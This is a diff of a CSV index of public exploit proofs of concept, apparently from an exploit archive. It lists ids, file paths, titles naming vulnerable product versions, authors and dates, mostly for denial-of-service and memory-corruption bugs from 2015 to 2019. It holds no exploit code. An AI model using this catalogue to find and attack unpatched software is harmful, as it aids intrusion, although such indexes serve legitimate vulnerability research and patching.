 38404,exploits/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow (PoC)",2015-10-06,hyp3rlinx,dos,windows,
@@ -6017,7 +6018,6 @@ id,file,description,date,author,type,platform,port
 44965,exploits/hardware/dos/44965.py,"Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)",2018-07-02,t4rkd3vilz,dos,hardware,80
 45106,exploits/linux/dos/45106.c,"fusermount - user_allow_other Restriction Bypass and SELinux Label Control",2018-07-30,"Google Security Research",dos,linux,
 44972,exploits/linux/dos/44972.py,"OpenSLP 2.0.0 - Double-Free",2018-07-03,"Magnus Klaaborg Stubman",dos,linux,
-44994,exploits/linux/dos/44994.html,"Tor Browser < 0.3.2.10 - Use After Free (PoC)",2018-07-09,t4rkd3vilz,dos,linux,
 45011,exploits/windows/dos/45011.js,"Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes",2018-07-12,"Google Security Research",dos,windows,
 45012,exploits/windows/dos/45012.js,"Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read",2018-07-12,"Google Security Research",dos,windows,
 45013,exploits/windows/dos/45013.js,"Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions",2018-07-12,"Google Security Research",dos,windows,
@@ -6296,7 +6296,7 @@ id,file,description,date,author,type,platform,port
 46304,exploits/windows/dos/46304.py,"Remote Process Explorer 1.0.0.16 - Buffer Overflow (PoC) (SEH Overwrite)",2019-02-01,"Rafael Pedrero",dos,windows,
 46309,exploits/windows/dos/46309.py,"MyVideoConverter Pro 3.14 - Denial of Service",2019-02-04,Achilles,dos,windows,
 46312,exploits/windows/dos/46312.py,"River Past Ringtone Converter 2.7.6.1601 - Denial of Service (PoC)",2019-02-04,"Rafael Pedrero",dos,windows,
-46313,exploits/windows/dos/46313.py,"SpotAuditor 3.6.7 - Denial of Service (PoC)",2019-02-04,"Rafael Pedrero",dos,windows,
+46313,exploits/windows/dos/46313.py,"SpotAuditor 3.6.7 - 'Base64 Encrypted Password' Denial of Service (PoC)",2019-02-04,"Rafael Pedrero",dos,windows,
 46314,exploits/windows/dos/46314.py,"TaskInfo 8.2.0.280 - Denial of Service (PoC)",2019-02-04,"Rafael Pedrero",dos,windows,
 46321,exploits/windows/dos/46321.py,"Device Monitoring Studio 8.10.00.8925 - Denial of Service (PoC)",2019-02-05,"Victor Mondragón",dos,windows,
 46322,exploits/windows/dos/46322.py,"River Past Audio Converter 7.7.16 - Denial of Service (PoC)",2019-02-05,Achilles,dos,windows,
@@ -6366,13 +6366,342 @@ id,file,description,date,author,type,platform,port
 46569,exploits/windows/dos/46569.txt,"Microsoft Edge - Flash click2play Bypass with CObjectElement::FinalCreateObject",2019-03-19,"Google Security Research",dos,windows,
 46570,exploits/multiple/dos/46570.txt,"Google Chrome < M73 - MidiManagerWin Use-After-Free",2019-03-19,"Google Security Research",dos,multiple,
 46571,exploits/multiple/dos/46571.txt,"Google Chrome < M73 - FileSystemOperationRunner Use-After-Free",2019-03-19,"Google Security Research",dos,multiple,
-46589,exploits/windows/dos/46589.php,"Canarytokens 2019-03-01 - Detection Bypass",2019-03-21,"Gionathan Reale",dos,windows,
+46589,exploits/windows/dos/46589.php,"Canarytokens 2019-03-01 - Detection Bypass",2019-03-21,"Benjamin Zink Loft_ Gionathan Reale",dos,windows,
 46594,exploits/linux/dos/46594.c,"snap - seccomp BBlacklist for TIOCSTI can be Circumvented",2019-03-22,"Google Security Research",dos,linux,
 46604,exploits/windows/dos/46604.txt,"Microsoft Windows 7/2008 - 'Win32k' Denial of Service (PoC)",2019-03-26,ze0r,dos,windows,
 46605,exploits/multiple/dos/46605.html,"Firefox < 66.0.1 - 'Array.prototype.slice' Buffer Overflow",2019-03-26,xuechiyaobai,dos,multiple,
 46613,exploits/multiple/dos/46613.js,"Spidermonkey - IonMonkey Type Inference is Incorrect for Constructors Entered via OSR",2019-03-26,"Google Security Research",dos,multiple,
 46621,exploits/windows/dos/46621.py,"Microsoft Visio 2016 16.0.4738.1000 - 'Log in accounts' Denial of Service",2019-03-28,"César Adrián Coronado Llanos",dos,windows,
 46626,exploits/linux/dos/46626.txt,"gnutls 3.6.6 - 'verify_crt()' Use-After-Free",2019-03-28,"Google Security Research",dos,linux,
+46646,exploits/multiple/dos/46646.txt,"SpiderMonkey - IonMonkey Compiled Code Fails to Update Inferred Property Types (Type Confusion)",2019-04-03,"Google Security Research",dos,multiple,
+46647,exploits/multiple/dos/46647.js,"WebKit JavaScriptCore - 'createRegExpMatchesArray' Type Confusion",2019-04-03,"Google Security Research",dos,multiple,
+46648,exploits/multiple/dos/46648.txt,"iOS < 12.2 / macOS < 10.14.4 XNU - pidversion Increment During execve is Unsafe",2019-04-03,"Google Security Research",dos,multiple,
+46649,exploits/multiple/dos/46649.js,"WebKit JavaScriptCore - Out-Of-Bounds Access in FTL JIT due to LICM Moving Array Access Before the Bounds Check",2019-04-03,"Google Security Research",dos,multiple,
+46650,exploits/multiple/dos/46650.js,"WebKit JavaScriptCore - CodeBlock Dangling Watchpoints Use-After-Free",2019-04-03,"Google Security Research",dos,multiple,
+46651,exploits/multiple/dos/46651.html,"WebKitGTK+ - 'ThreadedCompositor' Race Condition",2019-04-03,"Google Security Research",dos,multiple,
+46652,exploits/multiple/dos/46652.txt,"Google Chrome 72.0.3626.81 - 'V8TrustedTypePolicyOptions::ToImpl' Type Confusion",2019-04-03,"Google Security Research",dos,multiple,
+46653,exploits/multiple/dos/46653.html,"Google Chrome 73.0.3683.39 / Chromium 74.0.3712.0 - 'ReadableStream' Internal Object Leak Type Confusion",2019-04-03,"Google Security Research",dos,multiple,
+46656,exploits/windows/dos/46656.py,"Magic ISO Maker 5.5(build 281) - 'Serial Code' Denial of Service (PoC)",2019-04-04,"Alejandra Sánchez",dos,windows,
+46702,exploits/windows/dos/46702.py,"UltraVNC Viewer 1.2.2.4 - 'VNC Server' Denial of Service (PoC)",2019-04-15,"Victor Mondragón",dos,windows,
+46703,exploits/windows/dos/46703.py,"UltraVNC Launcher 1.2.2.4 - 'Path' Denial of Service (PoC)",2019-04-15,"Victor Mondragón",dos,windows,
+46708,exploits/windows/dos/46708.py,"PCHelpWare V2 1.0.0.5 - 'SC' Denial of Service (PoC)",2019-04-16,"Alejandra Sánchez",dos,windows,
+46709,exploits/windows/dos/46709.py,"PCHelpWare V2 1.0.0.5 - 'Group' Denial of Service (PoC)",2019-04-16,"Alejandra Sánchez",dos,windows,
+46711,exploits/windows/dos/46711.py,"AdminExpress 1.2.5 - 'Folder Path' Denial of Service (PoC)",2019-04-16,"Mücahit İsmail Aktaş",dos,windows,
+46720,exploits/hardware/dos/46720.sh,"ASUS HG100 - Denial of Service",2019-04-17,"YinT Wang",dos,hardware,
+46721,exploits/windows/dos/46721.py,"DHCP Server 2.5.2 - Denial of Service (PoC)",2019-04-17,"Victor Mondragón",dos,windows,
+46722,exploits/multiple/dos/46722.txt,"Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in sc_FindExtrema4",2019-04-17,"Google Security Research",dos,multiple,
+46723,exploits/multiple/dos/46723.txt,"Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in GlyphIterator::setCurrGlyphID",2019-04-17,"Google Security Research",dos,multiple,
+46726,exploits/multiple/dos/46726.txt,"Netwide Assembler (NASM) 2.14rc15 - NULL Pointer Dereference (PoC)",2019-04-18,"Fakhri Zulkifli",dos,multiple,
+46732,exploits/windows/dos/46732.py,"Ease Audio Converter 5.30 - '.mp4' Denial of Service (PoC)",2019-04-22,Achilles,dos,windows,
+46733,exploits/hardware/dos/46733.py,"QNAP myQNAPcloud Connect 1.3.4.0317 - 'Username/Password' Denial of Service",2019-04-22,"Dino Covotsos",dos,hardware,
+46735,exploits/multiple/dos/46735.html,"Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-Memory in Invalid Table Size Denial of Service (PoC)",2019-04-22,"Bogdan Kurinnoy",dos,multiple,
+46743,exploits/linux/dos/46743.txt,"systemd - Lack of Seat Verification in PAM Module Permits Spoofing Active Session to polkit",2019-04-23,"Google Security Research",dos,linux,
+46744,exploits/linux/dos/46744.c,"Linux - Missing Locking in Siemens R3964 Line Discipline Race Condition",2019-04-23,"Google Security Research",dos,linux,
+46745,exploits/linux/dos/46745.txt,"Linux - 'page->_refcount' Overflow via FUSE",2019-04-23,"Google Security Research",dos,linux,
+46749,exploits/windows/dos/46749.py,"HeidiSQL 10.1.0.5464 - Denial of Service (PoC)",2019-04-25,"Victor Mondragón",dos,windows,
+46750,exploits/windows/dos/46750.py,"Backup Key Recovery 2.2.4 - Denial of Service (PoC)",2019-04-25,"Victor Mondragón",dos,windows,
+46752,exploits/hardware/dos/46752.txt,"JioFi 4G M2S 1.0.2 - Denial of Service",2019-04-25,"Vikas Chaudhary",dos,hardware,
+46754,exploits/windows/dos/46754.py,"AnMing MP3 CD Burner 2.0 - Denial of Service (PoC)",2019-04-25,Achilles,dos,windows,
+46757,exploits/windows/dos/46757.py,"NSauditor 3.1.2.0 - 'Community' Denial of Service (PoC)",2019-04-26,"Victor Mondragón",dos,windows,
+46758,exploits/windows/dos/46758.py,"NSauditor 3.1.2.0 - 'Name' Denial of Service (PoC)",2019-04-26,"Victor Mondragón",dos,windows,
+46760,exploits/linux/dos/46760.txt,"systemd - DynamicUser can Create setuid Binaries when Assisted by Another Process",2019-04-26,"Google Security Research",dos,linux,
+46778,exploits/windows/dos/46778.py,"SpotAuditor 5.2.6 - 'Name' Denial of Service (PoC)",2019-04-30,"Victor Mondragón",dos,windows,
+46781,exploits/linux/dos/46781.txt,"Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification",2019-04-30,"Google Security Research",dos,linux,
+46793,exploits/windows/dos/46793.txt,"SolarWinds DameWare Mini Remote Control 10.0 - Denial of Service",2019-05-03,"Dino Barlattani",dos,windows,
+46803,exploits/ios/dos/46803.c,"iOS 12.1.3 - 'cfprefsd' Memory Corruption",2019-05-06,ZecOps,dos,ios,
+46806,exploits/windows/dos/46806.py,"Easy Chat Server 3.1 - 'message' Denial of Service (PoC)",2019-05-07,"Miguel Mendez Z",dos,windows,
+46810,exploits/windows/dos/46810.py,"jetAudio 8.1.7.20702 Basic - 'Enter URL' Denial of Service (PoC)",2019-05-08,"Victor Mondragón",dos,windows,
+46816,exploits/windows/dos/46816.py,"Lyric Video Creator 2.1 - '.mp3' Denial of Service (PoC)",2019-05-09,"Alejandra Sánchez",dos,windows,
+46817,exploits/windows/dos/46817.py,"Lyric Maker 2.0.1.0 - Denial of Service (PoC)",2019-05-09,"Alejandra Sánchez",dos,windows,
+46819,exploits/windows/dos/46819.py,"jetCast Server 2.0 - Denial of Service (PoC)",2019-05-10,"Victor Mondragón",dos,windows,
+46818,exploits/windows/dos/46818.py,"Convert Video jetAudio 8.1.7 - Denial of Service (PoC)",2019-05-09,"Alejandra Sánchez",dos,windows,
+46821,exploits/windows/dos/46821.py,"SpotIM 2.2 - Denial of Service (PoC)",2019-05-10,"Alejandra Sánchez",dos,windows,
+46822,exploits/windows/dos/46822.py,"SpotPaltalk 1.1.5 - Denial of Service (PoC)",2019-05-10,"Alejandra Sánchez",dos,windows,
+46823,exploits/windows/dos/46823.py,"ASPRunner.NET 10.1 - Denial of Service (PoC)",2019-05-10,"Victor Mondragón",dos,windows,
+46824,exploits/windows/dos/46824.py,"PHPRunner 10.1 - Denial of Service (PoC)",2019-05-10,"Victor Mondragón",dos,windows,
+46830,exploits/windows/dos/46830.py,"SpotMSN 2.4.6 - Denial of Service (PoC)",2019-05-13,"Victor Mondragón",dos,windows,
+46831,exploits/windows/dos/46831.py,"DNSS 2.1.8 - Denial of Service (PoC)",2019-05-13,"Victor Mondragón",dos,windows,
+46860,exploits/windows/dos/46860.py,"Sandboxie 5.30 - 'Programs Alerts' Denial of Service (PoC)",2019-05-17,"Alejandra Sánchez",dos,windows,
+46861,exploits/windows/dos/46861.py,"CEWE Photoshow 6.4.3 - 'Password' Denial of Service (PoC)",2019-05-17,"Alejandra Sánchez",dos,windows,
+46862,exploits/windows/dos/46862.py,"CEWE Photo Importer 6.4.3 - '.jpg' Denial of Service (PoC)",2019-05-17,"Alejandra Sánchez",dos,windows,
+46837,exploits/multiple/dos/46837.html,"Google Chrome V8 - Turbofan JSCallReducer::ReduceArrayIndexOfIncludes Out-of-Bounds Read/Write",2019-05-13,"Google Security Research",dos,multiple,
+46842,exploits/windows/dos/46842.py,"Selfie Studio 2.17 - 'Resize Image' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
+46843,exploits/windows/dos/46843.py,"TwistedBrush Pro Studio 24.06 - 'Resize Image' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
+46844,exploits/windows/dos/46844.py,"TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
+46845,exploits/windows/dos/46845.py,"TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
+46848,exploits/windows/dos/46848.py,"Tomabo MP4 Converter 3.25.22 - Denial of Service (PoC)",2019-05-15,"Alejandra Sánchez",dos,windows,
+46853,exploits/android/dos/46853.txt,"WeChat for Android 7.0.4 - 'vcodec2_hls_filter' Denial of Service",2019-05-16,"Hong Nhat Pham",dos,android,
+46855,exploits/windows/dos/46855.py,"ZOC Terminal 7.23.4 - 'Script' Denial of Service (PoC)",2019-05-16,"Victor Mondragón",dos,windows,
+46856,exploits/windows/dos/46856.py,"ZOC Terminal v7.23.4 - 'Private key file' Denial of Service (PoC)",2019-05-16,"Victor Mondragón",dos,windows,
+46857,exploits/windows/dos/46857.py,"ZOC Terminal v7.23.4 - 'Shell' Denial of Service (PoC)",2019-05-16,"Victor Mondragón",dos,windows,
+46858,exploits/windows/dos/46858.py,"Axessh 4.2 - 'Log file name' Denial of Service (PoC)",2019-05-16,"Victor Mondragón",dos,windows,
+46859,exploits/windows/dos/46859.py,"SEL AcSELerator Architect 2.2.24 - CPU Exhaustion Denial of Service",2019-05-16,LiquidWorm,dos,windows,
+46865,exploits/windows/dos/46865.py,"Huawei eSpace Meeting 1.1.11.103 - 'cenwpoll.dll' SEH Buffer Overflow (Unicode)",2019-05-20,LiquidWorm,dos,windows,
+46867,exploits/windows/dos/46867.txt,"Huawei eSpace 1.1.11.103 - Image File Format Handling Buffer Overflow",2019-05-20,LiquidWorm,dos,windows,
+46868,exploits/windows/dos/46868.txt,"Huawei eSpace 1.1.11.103 - 'ContactsCtrl.dll' / 'eSpaceStatusCtrl.dll' ActiveX Heap Overflow",2019-05-20,LiquidWorm,dos,windows,
+46871,exploits/windows/dos/46871.py,"Encrypt PDF 2.3 - Denial of Service (PoC)",2019-05-20,"Alejandra Sánchez",dos,windows,
+46872,exploits/windows/dos/46872.py,"PCL Converter 2.7 - Denial of Service (PoC)",2019-05-20,"Alejandra Sánchez",dos,windows,
+46873,exploits/windows/dos/46873.py,"docPrint Pro 8.0 - Denial of Service (PoC)",2019-05-20,"Alejandra Sánchez",dos,windows,
+46874,exploits/windows/dos/46874.py,"AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC)",2019-05-20,"Victor Mondragón",dos,windows,
+46875,exploits/windows/dos/46875.py,"BulletProof FTP Server 2019.0.0.50 - 'DNS Address' Denial of Service (PoC)",2019-05-20,"Victor Mondragón",dos,windows,
+46876,exploits/windows/dos/46876.py,"BulletProof FTP Server 2019.0.0.50 - 'Storage-Path' Denial of Service (PoC)",2019-05-20,"Victor Mondragón",dos,windows,
+46883,exploits/multiple/dos/46883.py,"Deluge 1.3.15 - 'URL' Denial of Service (PoC)",2019-05-21,"Victor Mondragón",dos,multiple,
+46884,exploits/windows/dos/46884.py,"Deluge 1.3.15 - 'Webseeds' Denial of Service (PoC)",2019-05-21,"Victor Mondragón",dos,windows,
+46888,exploits/multiple/dos/46888.txt,"Apple macOS < 10.14.5 / iOS < 12.3 DFG JIT Compiler - 'HasIndexedProperty' Use-After-Free",2019-05-21,"Google Security Research",dos,multiple,
+46889,exploits/multiple/dos/46889.txt,"Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - Loop-Invariant Code Motion (LICM) in DFG JIT Leaves Stack Variable Uninitialized",2019-05-21,"Google Security Research",dos,multiple,
+46890,exploits/multiple/dos/46890.txt,"Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - AIR Optimization Incorrectly Removes Assignment to Register",2019-05-21,"Google Security Research",dos,multiple,
+46891,exploits/multiple/dos/46891.cc,"Apple macOS < 10.14.5 / iOS < 12.3 XNU - Wild-read due to bad cast in stf_ioctl",2019-05-21,"Google Security Research",dos,multiple,
+46892,exploits/multiple/dos/46892.txt,"Apple macOS < 10.14.5 / iOS < 12.3 XNU - 'in6_pcbdetach' Stale Pointer Use-After-Free",2019-05-21,"Google Security Research",dos,multiple,
+46893,exploits/windows/dos/46893.py,"BlueStacks 4.80.0.1060 - Denial of Service (PoC)",2019-05-22,"Alejandra Sánchez",dos,windows,
+46899,exploits/windows/dos/46899.txt,"RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC)",2019-05-22,"Victor Mondragón",dos,windows,
+46900,exploits/windows/dos/46900.txt,"RarmaRadio 2.72.3 - 'Username' Denial of Service (PoC)",2019-05-22,"Victor Mondragón",dos,windows,
+46901,exploits/windows/dos/46901.py,"TapinRadio 2.11.6 - 'Address' Denial of Service (PoC)",2019-05-22,"Victor Mondragón",dos,windows,
+46902,exploits/windows/dos/46902.py,"TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC)",2019-05-22,"Victor Mondragón",dos,windows,
+46908,exploits/windows/dos/46908.py,"NetAware 1.20 - 'Add Block' Denial of Service (PoC)",2019-05-23,"Alejandra Sánchez",dos,windows,
+46909,exploits/windows/dos/46909.py,"NetAware 1.20 - 'Share Name' Denial of Service (PoC)",2019-05-23,"Alejandra Sánchez",dos,windows,
+46911,exploits/windows/dos/46911.py,"Terminal Services Manager 3.2.1 - Denial of Service",2019-05-23,"Alejandra Sánchez",dos,windows,
+46913,exploits/ios/dos/46913.txt,"Visual Voicemail for iPhone - IMAP NAMESPACE Processing Use-After-Free",2019-05-23,"Google Security Research",dos,ios,
+46923,exploits/windows/dos/46923.py,"Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC)",2019-05-24,"Victor Mondragón",dos,windows,
+46924,exploits/windows/dos/46924.py,"Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC)",2019-05-24,"Victor Mondragón",dos,windows,
+46925,exploits/windows/dos/46925.py,"Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC)",2019-05-24,"Victor Mondragón",dos,windows,
+46926,exploits/windows/dos/46926.py,"Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)",2019-05-24,"Victor Mondragón",dos,windows,
+46927,exploits/windows/dos/46927.py,"Cyberoam General Authentication Client 2.1.2.7 - 'Server Address' Denial of Service (PoC)",2019-05-24,"Victor Mondragón",dos,windows,
+46929,exploits/windows/dos/46929.py,"Fast AVI MPEG Joiner - 'License Name' Denial of Service (PoC)",2019-05-24,Achilles,dos,windows,
+46930,exploits/windows/dos/46930.py,"Pidgin 2.13.0 - Denial of Service (PoC)",2019-05-27,"Alejandra Sánchez",dos,windows,
+46937,exploits/windows/dos/46937.py,"Free SMTP Server 2.5 - Denial of Service (PoC)",2019-05-29,"Metin Yunus Kandemir",dos,windows,
+46939,exploits/multiple/dos/46939.txt,"Spidermonkey - IonMonkey Leaks JS_OPTIMIZED_OUT Magic Value to Script",2019-05-29,"Google Security Research",dos,multiple,
+46940,exploits/multiple/dos/46940.txt,"Spidermonkey - IonMonkey Unexpected ObjectGroup in ObjectGroupDispatch Operation",2019-05-29,"Google Security Research",dos,multiple,
+46941,exploits/android/dos/46941.txt,"Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL",2019-05-29,"Google Security Research",dos,android,
+46946,exploits/windows/dos/46946.py,"Microsoft Windows Remote Desktop - 'BlueKeep' Denial of Service",2019-05-30,n1xbyte,dos,windows,
+46968,exploits/multiple/dos/46968.html,"Google Chrome 73.0.3683.103 - 'WasmMemoryObject::Grow' Use-After-Free",2019-06-05,"Google Security Research",dos,multiple,
+46995,exploits/windows/dos/46995.txt,"HC10 HC.Server Service 10.14 - Remote Invalid Pointer Write",2019-06-17,hyp3rlinx,dos,windows,
+46997,exploits/linux/dos/46997.py,"Netperf 2.6.0 - Stack-Based Buffer Overflow",2019-06-17,"Juan Sacco",dos,linux,
+47001,exploits/multiple/dos/47001.txt,"Thunderbird ESR < 60.7.XXX - Type Confusion",2019-06-17,"X41 D-Sec GmbH",dos,multiple,
+47002,exploits/multiple/dos/47002.txt,"Thunderbird ESR < 60.7.XXX - 'icalmemorystrdupanddequote' Heap-Based Buffer Overflow",2019-06-17,"X41 D-Sec GmbH",dos,multiple,
+47003,exploits/multiple/dos/47003.txt,"Thunderbird ESR < 60.7.XXX - 'parser_get_next_char' Heap-Based Buffer Overflow",2019-06-17,"X41 D-Sec GmbH",dos,multiple,
+47004,exploits/multiple/dos/47004.txt,"Thunderbird ESR < 60.7.XXX - 'icalrecur_add_bydayrules' Stack-Based Buffer Overflow",2019-06-17,"X41 D-Sec GmbH",dos,multiple,
+47015,exploits/linux/dos/47015.c,"Linux - Use-After-Free via race Between modify_ldt() and #BR Exception",2019-06-20,"Google Security Research",dos,linux,
+47026,exploits/windows/dos/47026.txt,"GSearch 1.0.1.0 - Denial of Service (PoC)",2019-06-24,0xB9,dos,windows,
+47028,exploits/windows/dos/47028.txt,"Microsoft Windows - 'CmpAddRemoveContainerToCLFSLog' Arbitrary File/Directory Creation",2019-06-24,"Google Security Research",dos,windows,
+47029,exploits/windows/dos/47029.txt,"Microsoft Windows Font Cache Service - Insecure Sections Privilege Escalation",2019-06-24,"Google Security Research",dos,windows,
+47038,exploits/multiple/dos/47038.txt,"Mozilla Spidermonkey - IonMonkey 'Array.prototype.pop' Type Confusion",2019-06-26,"Google Security Research",dos,multiple,
+47079,exploits/multiple/dos/47079.html,"Firefox 67.0.4 - Denial of Service",2019-07-09,"Tejas Ajay Naik",dos,multiple,
+47084,exploits/windows/dos/47084.txt,"Microsoft Windows - Font Subsetting DLL Heap-Based Out-of-Bounds Read in MergeFonts",2019-07-10,"Google Security Research",dos,windows,
+47085,exploits/multiple/dos/47085.js,"Mozilla Spidermonkey - Unboxed Objects Uninitialized Memory Access",2019-07-10,"Google Security Research",dos,multiple,
+47086,exploits/windows/dos/47086.txt,"Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling due to Out-of-Bounds cubeStackDepth",2019-07-10,"Google Security Research",dos,windows,
+47087,exploits/windows/dos/47087.txt,"Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Negative cubeStackDepth",2019-07-10,"Google Security Research",dos,windows,
+47088,exploits/windows/dos/47088.txt,"Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Negative nAxes",2019-07-10,"Google Security Research",dos,windows,
+47089,exploits/windows/dos/47089.txt,"Microsoft DirectWrite / AFDKO - Stack-Based Buffer Overflow in do_set_weight_vector_cube for Large nAxes",2019-07-10,"Google Security Research",dos,windows,
+47090,exploits/windows/dos/47090.txt,"Microsoft DirectWrite / AFDKO - Use of Uninitialized Memory While Freeing Resources in var_loadavar",2019-07-10,"Google Security Research",dos,windows,
+47091,exploits/windows/dos/47091.txt,"Microsoft DirectWrite / AFDKO - Interpreter Stack Underflow in OpenType Font Handling Due to Missing CHKUFLOW",2019-07-10,"Google Security Research",dos,windows,
+47092,exploits/windows/dos/47092.txt,"Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Incorrect Handling of blendArray",2019-07-10,"Google Security Research",dos,windows,
+47093,exploits/windows/dos/47093.txt,"Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readEncoding",2019-07-10,"Google Security Research",dos,windows,
+47094,exploits/windows/dos/47094.txt,"Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readFDSelect",2019-07-10,"Google Security Research",dos,windows,
+47095,exploits/windows/dos/47095.txt,"Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readCharset",2019-07-10,"Google Security Research",dos,windows,
+47096,exploits/windows/dos/47096.txt,"Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow Due to Integer Overflow in readTTCDirectory",2019-07-10,"Google Security Research",dos,windows,
+47097,exploits/windows/dos/47097.txt,"Microsoft DirectWrite / AFDKO - Heap-Based Out-of-Bounds Read/Write in OpenType Font Handling Due to Unbounded iFD",2019-07-10,"Google Security Research",dos,windows,
+47098,exploits/windows/dos/47098.txt,"Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readStrings",2019-07-10,"Google Security Research",dos,windows,
+47099,exploits/windows/dos/47099.txt,"Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling While Processing CFF Blend DICT Operator",2019-07-10,"Google Security Research",dos,windows,
+47100,exploits/windows/dos/47100.txt,"Microsoft DirectWrite / AFDKO - Out-of-Bounds Read in OpenType Font Handling Due to Undefined FontName Index",2019-07-10,"Google Security Research",dos,windows,
+47101,exploits/windows/dos/47101.txt,"Microsoft DirectWrite / AFDKO - Multiple Bugs in OpenType Font Handling Related to the _post_ Table",2019-07-10,"Google Security Research",dos,windows,
+47102,exploits/windows/dos/47102.txt,"Microsoft DirectWrite / AFDKO - NULL Pointer Dereferences in OpenType Font Handling While Accessing Empty dynarrays",2019-07-10,"Google Security Research",dos,windows,
+47103,exploits/windows/dos/47103.txt,"Microsoft DirectWrite / AFDKO - Heap-Based Out-of-Bounds Read/Write in OpenType Font Handling Due to Empty ROS Strings",2019-07-10,"Google Security Research",dos,windows,
+47113,exploits/windows/dos/47113.txt,"Microsoft Font Subsetting - DLL Heap Corruption in ComputeFormat4CmapData",2019-07-12,"Google Security Research",dos,windows,
+47119,exploits/android/dos/47119.txt,"Android 7 - 9 VideoPlayer - 'ihevcd_parse_pps' Out-of-Bounds Write",2019-07-15,"Marcin Kozlowski",dos,android,
+47120,exploits/windows/dos/47120.rb,"Microsoft Windows Remote Desktop - 'BlueKeep' Denial of Service (Metasploit)",2019-07-15,"RAMELLA Sebastien",dos,windows,3389
+47127,exploits/windows/dos/47127.txt,"Microsoft Compiled HTML Help / Uncompiled .chm File - XML External Entity Injection",2019-07-16,hyp3rlinx,dos,windows,
+47131,exploits/windows/dos/47131.py,"WinMPG iPod Convert 3.0 - 'Register' Denial of Service",2019-07-17,stresser,dos,windows,
+47148,exploits/linux/dos/47148.py,"BACnet Stack 0.8.6 - Denial of Service",2019-07-22,mmorillo,dos,linux,
+47158,exploits/watchos/dos/47158.txt,"Apple iMessage - DigitalTouch tap Message Processing Out-of-Bounds Read",2019-07-24,"Google Security Research",dos,watchos,
+47162,exploits/multiple/dos/47162.txt,"WebKit - Universal Cross-Site Scripting due to Synchronous Page Loads",2019-07-25,"Google Security Research",dos,multiple,
+47178,exploits/linux/dos/47178.txt,"pdfresurrect 0.15 - Buffer Overflow",2019-07-26,j0lama,dos,linux,
+47189,exploits/multiple/dos/47189.txt,"macOS / iOS NSKeyedUnarchiver - Use-After-Free of ObjC Objects when Unarchiving OITSUIntDictionary Instances",2019-07-30,"Google Security Research",dos,multiple,
+47190,exploits/multiple/dos/47190.txt,"macOS / iOS JavaScriptCore - Loop-Invariant Code Motion (LICM) Leaves Object Property Access Unguarded",2019-07-30,"Google Security Research",dos,multiple,
+47191,exploits/multiple/dos/47191.txt,"macOS / iOS JavaScriptCore - JSValue Use-After-Free in ValueProfiles",2019-07-30,"Google Security Research",dos,multiple,
+47192,exploits/multiple/dos/47192.txt,"iMessage - NSArray Deserialization can Invoke Subclass that does not Retain References",2019-07-30,"Google Security Research",dos,multiple,
+47193,exploits/multiple/dos/47193.txt,"iMessage - Memory Corruption when Decoding NSKnownKeysDictionary1",2019-07-30,"Google Security Research",dos,multiple,
+47194,exploits/multiple/dos/47194.txt,"iMessage - NSKeyedUnarchiver Deserialization Allows file Backed NSData Objects",2019-07-30,"Google Security Research",dos,multiple,
+47207,exploits/macos/dos/47207.txt,"macOS iMessage - Heap Overflow when Deserializing",2019-08-05,"Google Security Research",dos,macos,
+47211,exploits/multiple/dos/47211.html,"Google Chrome 74.0.3729.0 / 76.0.3789.0 - Heap Use-After-Free in blink::PresentationAvailabilityState::UpdateAvailability",2019-08-07,"Google Security Research",dos,multiple,
+47233,exploits/vxworks/dos/47233.py,"VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow",2019-08-12,"Zhou Yu",dos,vxworks,
+47236,exploits/linux/dos/47236.c,"Linux - Use-After-Free Reads in show_numa_stats()",2019-08-12,"Google Security Research",dos,linux,
+47237,exploits/multiple/dos/47237.txt,"WebKit - UXSS via XSLT and Nested Document Replacements",2019-08-12,"Google Security Research",dos,multiple,
+47248,exploits/windows/dos/47248.py,"Windows PowerShell - Unsanitized Filename Command Execution",2019-08-14,hyp3rlinx,dos,windows,
+47254,exploits/linux/dos/47254.txt,"ABC2MTEX 1.6.1 - Command Line Stack Overflow",2019-08-14,"Carter Yagemann",dos,linux,
+47257,exploits/multiple/dos/47257.txt,"NSKeyedUnarchiver - Info Leak in Decoding SGBigUTF8String",2019-08-15,"Google Security Research",dos,multiple,
